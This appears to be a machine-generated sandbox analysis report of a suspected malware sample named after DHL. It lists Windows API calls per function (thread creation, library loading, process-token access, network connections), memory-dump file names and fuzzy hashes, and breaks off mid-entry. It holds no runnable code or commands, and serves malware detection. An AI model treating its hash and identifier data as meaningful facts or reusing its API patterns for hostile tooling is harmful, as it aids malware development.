                                                        • Instruction Fuzzy Hash: 1711B471E0061496DB20DFB98C86BEE77BCAF11760F54802AF915D6081E7748A80CB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e94ecd7740e0e51192f3c6d2fdd3059fe6ca9812bfcc1136e0d77801478a051
                                                        • Instruction ID: 5f5eddcb75f15ec6bb213828844d63e761f7c2bb449aebd06ea258ec5265ebd4
                                                        • Opcode Fuzzy Hash: 5e94ecd7740e0e51192f3c6d2fdd3059fe6ca9812bfcc1136e0d77801478a051
                                                        • Instruction Fuzzy Hash: 98018BB72896167FF6212AB86CC0F67661EDF817B8B308327F522A13D2DB608C409160
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A01A47
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A01A59
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A01A6F
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A01A8A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: c9778418000054a38d570816bdb211ad9a4425707c095b8749dbd1e08f8aae5e
                                                        • Instruction ID: e99503cb051a2cafe22c3ca3d67b7d8a0cc7984a7701f739214d8a732d49f4d8
                                                        • Opcode Fuzzy Hash: c9778418000054a38d570816bdb211ad9a4425707c095b8749dbd1e08f8aae5e
                                                        • Instruction Fuzzy Hash: E811F73AA01219FFEB11DBA5DD85FEDBB78EB08750F200091EA04B7290D6716E51DB94
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A0E1FD
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00A0E230
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A0E246
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A0E24D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: cd1653e46db387e97e6810b5d670b24f4a835c61f3ca6535009ab2823f08de69
                                                        • Instruction ID: ccfc939b136acd7984c02ce45d87b8af702ad80e7e12541f470065eaaebb8f3c
                                                        • Opcode Fuzzy Hash: cd1653e46db387e97e6810b5d670b24f4a835c61f3ca6535009ab2823f08de69
                                                        • Instruction Fuzzy Hash: FE110872D04218BBCB01DBECAC09ADE7FACAB45325F008719F924E72D0D270C90187A0
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,?,009CCFF9,00000000,00000004,00000000), ref: 009CD218
                                                        • GetLastError.KERNEL32 ref: 009CD224
                                                        • __dosmaperr.LIBCMT ref: 009CD22B
                                                        • ResumeThread.KERNEL32(00000000), ref: 009CD249
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                        • String ID:
                                                        • API String ID: 173952441-0
                                                        • Opcode ID: 0737f74cbe11c1eab17552bf88b3a63c9acc84a24dde029c139eea3f2e7f5a1b
                                                        • Instruction ID: 2fd20045132914c9487ab971eee6c9f95d6317974cd768f5aee23532d0ed5885
                                                        • Opcode Fuzzy Hash: 0737f74cbe11c1eab17552bf88b3a63c9acc84a24dde029c139eea3f2e7f5a1b
                                                        • Instruction Fuzzy Hash: 6C019276C06204BBDB219BA5DC09FAA7A6DDFC1731F20422DF935961D0DB71C901D7A2
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009A604C
                                                        • GetStockObject.GDI32(00000011), ref: 009A6060
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 009A606A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID:
                                                        • API String ID: 3970641297-0
                                                        • Opcode ID: 97f1c9ae6957a777d8b6de8bb95e28683f5b4fa3beb27f41045b80e383e55d71
                                                        • Instruction ID: 7e6ccbd41d20ea68389ea99a89adc8f412ed999c5a7d4aab48ecdd89238ae162
                                                        • Opcode Fuzzy Hash: 97f1c9ae6957a777d8b6de8bb95e28683f5b4fa3beb27f41045b80e383e55d71
                                                        • Instruction Fuzzy Hash: F5116D72501959BFEF128FA59C44EEABB6DFF093A4F090215FA1462110D7369CA1EBE0
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 009C3B56
                                                          • Part of subcall function 009C3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009C3AD2
                                                          • Part of subcall function 009C3AA3: ___AdjustPointer.LIBCMT ref: 009C3AED
                                                        • _UnwindNestedFrames.LIBCMT ref: 009C3B6B
                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 009C3B7C
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 009C3BA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                        • String ID:
                                                        • API String ID: 737400349-0
                                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                        • Instruction ID: a54d4fb1c8a85f3e42606a7017217452d97cc85948d3d68efc17c2cbe7b9032d
                                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                        • Instruction Fuzzy Hash: AF01D732900149BBDF129E95CC46FEB7B6DEF98754F048018FE5866121C632E9619BA1
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009A13C6,00000000,00000000,?,009D301A,009A13C6,00000000,00000000,00000000,?,009D328B,00000006,FlsSetValue), ref: 009D30A5
                                                        • GetLastError.KERNEL32(?,009D301A,009A13C6,00000000,00000000,00000000,?,009D328B,00000006,FlsSetValue,00A42290,FlsSetValue,00000000,00000364,?,009D2E46), ref: 009D30B1
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009D301A,009A13C6,00000000,00000000,00000000,?,009D328B,00000006,FlsSetValue,00A42290,FlsSetValue,00000000), ref: 009D30BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 67a019ac47df2390d616066f8284efc3f1837f1f7ee665746446887817348fd9
                                                        • Instruction ID: 244962bc1b7845bbe4ba6da438c41239da634e3410d5d577f3792e0d53be2f64
                                                        • Opcode Fuzzy Hash: 67a019ac47df2390d616066f8284efc3f1837f1f7ee665746446887817348fd9
                                                        • Instruction Fuzzy Hash: 8001D436381222ABCB218BB8EC449577B9CAF45B72B14C621F905F7240C725D902C7E1
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00A0747F
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A07497
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A074AC
                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A074CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: 5bde2e0b209e228185ab95509d1e3d7ed821b53ee33b7a7780bd867b8ed822f5
                                                        • Instruction ID: cf664e9e7d7e6ee3714f811c75cff19384d544af0536a8cea7ac3aad8dcdb07a
                                                        • Opcode Fuzzy Hash: 5bde2e0b209e228185ab95509d1e3d7ed821b53ee33b7a7780bd867b8ed822f5
                                                        • Instruction Fuzzy Hash: 1211ADB5A05318ABE720CF58EC08B9A7BFCEB00B10F108569B656E6191D7B2F904DB60
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A0ACD3,?,00008000), ref: 00A0B0C4
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A0ACD3,?,00008000), ref: 00A0B0E9
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A0ACD3,?,00008000), ref: 00A0B0F3
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A0ACD3,?,00008000), ref: 00A0B126
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 667a5b49148da314d1614ccf068461d31745e3e3d42b910967df3cc60a18d36c
                                                        • Instruction ID: e0b8b6c6567b63e3e652b0c971b1866a67b8ecfeefaf5fcaa46361fc938d3de0
                                                        • Opcode Fuzzy Hash: 667a5b49148da314d1614ccf068461d31745e3e3d42b910967df3cc60a18d36c
                                                        • Instruction Fuzzy Hash: 0C116D31C1152CE7CF00EFE4EE68AEEBB78FF49721F104285E941B2181CB3056619BA1
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A02DC5
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A02DD6
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A02DDD
                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A02DE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 8541f380f3ae5a5158dc4948600ba39f9aa4ece8ba62a5e52ce4adc36a59c524
                                                        • Instruction ID: 47518e6ebbcb6abd3d30e56a0cf1ff44a8ce49c549a9afedaa77c262f3d44230
                                                        • Opcode Fuzzy Hash: 8541f380f3ae5a5158dc4948600ba39f9aa4ece8ba62a5e52ce4adc36a59c524
                                                        • Instruction Fuzzy Hash: 31E06D711013287ADB205BA2AC0EFEB7E6CEB42BB1F001115B105E10809AA0C942C7B0
                                                        APIs
                                                          • Part of subcall function 009B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009B9693
                                                          • Part of subcall function 009B9639: SelectObject.GDI32(?,00000000), ref: 009B96A2
                                                          • Part of subcall function 009B9639: BeginPath.GDI32(?), ref: 009B96B9
                                                          • Part of subcall function 009B9639: SelectObject.GDI32(?,00000000), ref: 009B96E2
                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A38887
                                                        • LineTo.GDI32(?,?,?), ref: 00A38894
                                                        • EndPath.GDI32(?), ref: 00A388A4
                                                        • StrokePath.GDI32(?), ref: 00A388B2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: d675fbda64ebaabeb3746dc7fe2f0949c6da9d01938d23213e09da94573391f1
                                                        • Instruction ID: cfaf9acec7528f26a1db28fc48983b0dfda99b6c95a87cf3ac75edba0d21ba95
                                                        • Opcode Fuzzy Hash: d675fbda64ebaabeb3746dc7fe2f0949c6da9d01938d23213e09da94573391f1
                                                        • Instruction Fuzzy Hash: 14F0DA36045659FBDB129FD8AC0AFCA3B69AF06320F448100FB12750E2C7795552DBA5
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 009B98CC
                                                        • SetTextColor.GDI32(?,?), ref: 009B98D6
                                                        • SetBkMode.GDI32(?,00000001), ref: 009B98E9
                                                        • GetStockObject.GDI32(00000005), ref: 009B98F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Color$ModeObjectStockText
                                                        • String ID:
                                                        • API String ID: 4037423528-0
                                                        • Opcode ID: b5de0dc1feea99d0ff56a46c367bfa0e4b6c2e6b1b6cb7d9e4c0eaf3b42e38dd
                                                        • Instruction ID: f65ad7ae99c51cd6159e7d92b81773d882b23b1c06cb31eaf2aa067e09c5f8b5
                                                        • Opcode Fuzzy Hash: b5de0dc1feea99d0ff56a46c367bfa0e4b6c2e6b1b6cb7d9e4c0eaf3b42e38dd
                                                        • Instruction Fuzzy Hash: A3E09B31244244AEDF219BB4FC09BE87F15EB11335F048319F7F6650E1C37146419B10
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00A01634
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A011D9), ref: 00A0163B
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A011D9), ref: 00A01648
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A011D9), ref: 00A0164F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: 06a5772e20ebcabc7758a1afa8876a85d3fd01832d41bc32987f5bda5c532e65
                                                        • Instruction ID: 3a5e05cee55c3fd6be6dc336aa6e5d41d251fb52ce7b52f997ef36ad98e27043
                                                        • Opcode Fuzzy Hash: 06a5772e20ebcabc7758a1afa8876a85d3fd01832d41bc32987f5bda5c532e65
                                                        • Instruction Fuzzy Hash: 59E08C32A02211EBD7206FE0AE0DBC77B7CAF457A6F148808F245E9080E7348546CB60
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 009FD858
                                                        • GetDC.USER32(00000000), ref: 009FD862
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009FD882
                                                        • ReleaseDC.USER32(?), ref: 009FD8A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 994c86072c158d2058c8c35890560e425a67cafbd41c2e697e6d95b59be9053b
                                                        • Instruction ID: 9f10b5b3fd4e4b65dfb5970775f0bcd522ab27895c297a6399b4b057467df372
                                                        • Opcode Fuzzy Hash: 994c86072c158d2058c8c35890560e425a67cafbd41c2e697e6d95b59be9053b
                                                        • Instruction Fuzzy Hash: 2EE0EEB1800204EFCB41EFE09D09A6DBBB2AB08320F209409F846A7260CB388902AF40
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 009FD86C
                                                        • GetDC.USER32(00000000), ref: 009FD876
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009FD882
                                                        • ReleaseDC.USER32(?), ref: 009FD8A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 659ea921f270b6a369cb2119b7d36d91a986ecdd7c72ed5b59fab01fb03a10f8
                                                        • Instruction ID: d3800c71161a4cf811821305806ba89080f9f7cca2d64d3cf145ca48f4a921cb
                                                        • Opcode Fuzzy Hash: 659ea921f270b6a369cb2119b7d36d91a986ecdd7c72ed5b59fab01fb03a10f8
                                                        • Instruction Fuzzy Hash: 21E092B5800604EFCB51EFE0DD4D66DBBB5BB48321F149449F94AF7260DB389902AF50
                                                        APIs
                                                          • Part of subcall function 009A7620: _wcslen.LIBCMT ref: 009A7625
                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A14ED4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Connection_wcslen
                                                        • String ID: *$LPT
                                                        • API String ID: 1725874428-3443410124
                                                        • Opcode ID: 99f4e1f5f776dbf5987afa5f8cb1bd8fa92de2fd57c68d7ef7b02c0d1a9bd921
                                                        • Instruction ID: f80548cbe88d443d89fb14128176240e8d80e18416eded6081e2742f069be359
                                                        • Opcode Fuzzy Hash: 99f4e1f5f776dbf5987afa5f8cb1bd8fa92de2fd57c68d7ef7b02c0d1a9bd921
                                                        • Instruction Fuzzy Hash: 1C915075A002049FCB14DF58C494EEABBF5BF49714F198099E80A9F3A2D731ED86CB91
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 009CE30D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
